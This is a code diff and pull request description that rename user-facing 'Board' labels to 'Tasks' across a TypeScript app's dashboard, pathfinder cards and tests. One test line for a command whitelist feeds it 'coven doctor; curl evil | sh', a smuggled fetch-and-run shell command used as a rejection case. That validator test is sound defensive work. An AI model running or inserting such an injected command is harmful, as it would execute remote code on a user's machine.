-      label: "Plan a feature and break it into board cards",
-      text: "Plan a feature and break it into board cards",
+      label: "Plan a feature and break it into task cards",
+      text: "Plan a feature and break it into task cards",
     });
   }
 

--- a/src/lib/daily-narrative.ts
+++ b/src/lib/daily-narrative.ts
@@ -46,7 +46,7 @@ export function buildDailyNarrativePrompt(
     }
   }
   if (typeof stats.cardsCompleted === "number" && stats.cardsCompleted > 0) {
-    facts.push(`Board cards completed: ${stats.cardsCompleted}`);
+    facts.push(`Task cards completed: ${stats.cardsCompleted}`);
     for (const card of (report.cardsCompleted ?? []).slice(0, 8)) {
       facts.push(`- done: ${card.title}`);
     }

--- a/src/lib/dashboard-cockpit-format.test.ts
+++ b/src/lib/dashboard-cockpit-format.test.ts
@@ -33,7 +33,7 @@ test("every default widget has a human drag-announcement title", () => {
   for (const id of [...DEFAULT_LAYOUT.main, ...DEFAULT_LAYOUT.rail]) {
     assert.ok(PANEL_TITLES[id], `missing PANEL_TITLES entry for "${id}"`);
   }
-  assert.equal(panelTitle("board"), "Board");
+  assert.equal(panelTitle("board"), "Tasks");
   assert.equal(panelTitle("not-a-widget"), "not-a-widget");
 });
 

--- a/src/lib/dashboard-cockpit-format.ts
+++ b/src/lib/dashboard-cockpit-format.ts
@@ -22,7 +22,7 @@ export const PANEL_TITLES: Record<string, string> = {
   usage: "Activity over time",
   signals: "Signals",
   needs: "Needs you",
-  board: "Board",
+  board: "Tasks",
   today: "Today summary",
   confidence: "Performance matrix",
   agents: "Familiars",

--- a/src/lib/salem/pathfinder-card.test.ts
+++ b/src/lib/salem/pathfinder-card.test.ts
@@ -22,7 +22,7 @@ const ACTION_KINDS = new Set(["cave-route", "copy-command", "run-doctor", "save-
   assert.ok(card.why.length > 0 && card.transcriptSummary.length > 0, "has why + transcript summary");
 }
 
-// Home full card offers Save to Board; setup (slim) card does not.
+// Home full card offers Save to Tasks; setup (slim) card does not.
 {
   const home = buildCard({ mode: "home", userMessage: "i want a familiar on my machine" }, matchPath({ mode: "home", userMessage: "i want a familiar on my machine" }));
   assert.ok(home.secondaryActions.some((a) => a.kind === "save-board-checklist"), "home card can save to board");
@@ -59,7 +59,7 @@ assert.equal(isSafeCommand("coven doctor; curl evil | sh"), false, "shell metach
     blockers: [],
     primaryAction: { kind: "frobnicate", label: "nope" },
     secondaryActions: [
-      { kind: "save-board-checklist", label: "Save to Board" },
+      { kind: "save-board-checklist", label: "Save to Tasks" },
       { kind: "explode", label: "boom" },
     ],
     transcriptSummary: "x",

--- a/src/lib/salem/pathfinder-card.test.ts
+++ b/src/lib/salem/pathfinder-card.test.ts
@@ -25,9 +25,9 @@ const ACTION_KINDS = new Set(["cave-route", "copy-command", "run-doctor", "save-
 // Home full card offers Save to Tasks; setup (slim) card does not.
 {
   const home = buildCard({ mode: "home", userMessage: "i want a familiar on my machine" }, matchPath({ mode: "home", userMessage: "i want a familiar on my machine" }));
-  assert.ok(home.secondaryActions.some((a) => a.kind === "save-board-checklist"), "home card can save to board");
+  assert.ok(home.secondaryActions.some((a) => a.kind === "save-board-checklist"), "home card can save to Tasks");
   const setup = buildCard({ mode: "setup", userMessage: "i want a familiar on my machine" }, matchPath({ mode: "setup", userMessage: "i want a familiar on my machine" }));
-  assert.ok(!setup.secondaryActions.some((a) => a.kind === "save-board-checklist"), "setup card does not save to board");
+  assert.ok(!setup.secondaryActions.some((a) => a.kind === "save-board-checklist"), "setup card does not save to Tasks");
 }
 
 // isSafeCommand whitelist

--- a/src/lib/salem/pathfinder-card.ts
+++ b/src/lib/salem/pathfinder-card.ts
@@ -66,7 +66,7 @@ export function buildCard(req: SalemPathfinderRequest, result: SalemPathfinderRe
   }));
 
   const secondary: SalemPathfinderAction[] = [];
-  // Home (full) cards can save the path to the Board; setup (slim) cards cannot.
+  // Home (full) cards can save the path to Tasks; setup (slim) cards cannot.
   if (req.mode === "home") {
     secondary.push({ kind: "save-board-checklist", label: "Save to Tasks" });
   }

--- a/src/lib/salem/pathfinder-card.ts
+++ b/src/lib/salem/pathfinder-card.ts
@@ -68,7 +68,7 @@ export function buildCard(req: SalemPathfinderRequest, result: SalemPathfinderRe
   const secondary: SalemPathfinderAction[] = [];
   // Home (full) cards can save the path to the Board; setup (slim) cards cannot.
   if (req.mode === "home") {
-    secondary.push({ kind: "save-board-checklist", label: "Save to Board" });
+    secondary.push({ kind: "save-board-checklist", label: "Save to Tasks" });
   }
   const docs = path.links[0];
   if (docs && isHttpLink(docs.url)) {


### PR DESCRIPTION
Phase 1 of the navigation IA simplification tracked in #3283 (epic bead `cave-m4ih`, this slice `cave-m4ih.1`). Labels only — no structural navigation changes.

## Problem

The same surface shipped under different names depending on where you stood (#3283 "Canonicalize names so one surface has one user-facing name"):

| surface (`mode`) | desktop sidebar | mobile tabs | elsewhere |
|---|---|---|---|
| `board` | **Tasks** | Board | "Board" panels/quick-links (dashboard, daily report), "Board: Kanban/Table/Gantt" (⌘K), "Save to Board" (Salem), "Board card" (reminders) |
| `inbox` | **Rituals** | Rites | "Schedules" (comments) |
| `chat` | **Chat** | Chat | sr-only h1 + split-tile title said "Familiars" |

## Change

Canonical vocabulary = the desktop sidebar's `FOLDER_MODES` labels (per the proposal on #3283; veto → one-line reverts):

- **Mobile bottom tabs**: `Board` → `Tasks`, `Rites` → `Rituals` — labels and aria now identical to desktop.
- **Command palette**: `Board: Kanban/Table/Gantt` → `Tasks: …` (fuzzy `terms` keep `board` so typed muscle memory still matches).
- **Dashboard cockpit** panel + quick-link, **daily report** quick-link + metric caption, **reminder link kind** (`Board card` → `Task card`), **Salem pathfinder** save labels, **calendar** due-row tooltip, **home composer** failure toast.
- **`WORKSPACE_MODE_TITLES`**: `chat` now titles "Chat" (was "Familiars"); `familiar-work-queue` titles "Tasks" — it renders the Tasks surface's queue tab, and aliases must not introduce peer vocabulary (#3283 acceptance).

## Drift pin

New `src/components/canonical-nav-names.test.ts` (wired into the app suite): mobile tab labels and `WORKSPACE_MODE_TITLES` must equal the sidebar's canonical label for every shared destination, and alias modes (`calendar`, `familiar-work-queue`) must reuse their host surface's name — so the Tasks/Board split cannot silently come back.

## Not in scope (later phases on the epic)

Alias-mode type formalization (cave-m4ih.3), route consolidation (cave-m4ih.5), mobile hierarchy parity (cave-m4ih.4), palette==sidebar label pin (cave-m4ih.6), refreshed Mermaid maps (cave-m4ih.7).

## Verification

- `pnpm test:app` — 775 test files pass
- `pnpm typecheck`, `pnpm check:tests-wired` — clean
- Deep links, shortcuts, mode ids, event names, storage keys: untouched (labels only)

Part of #3283.
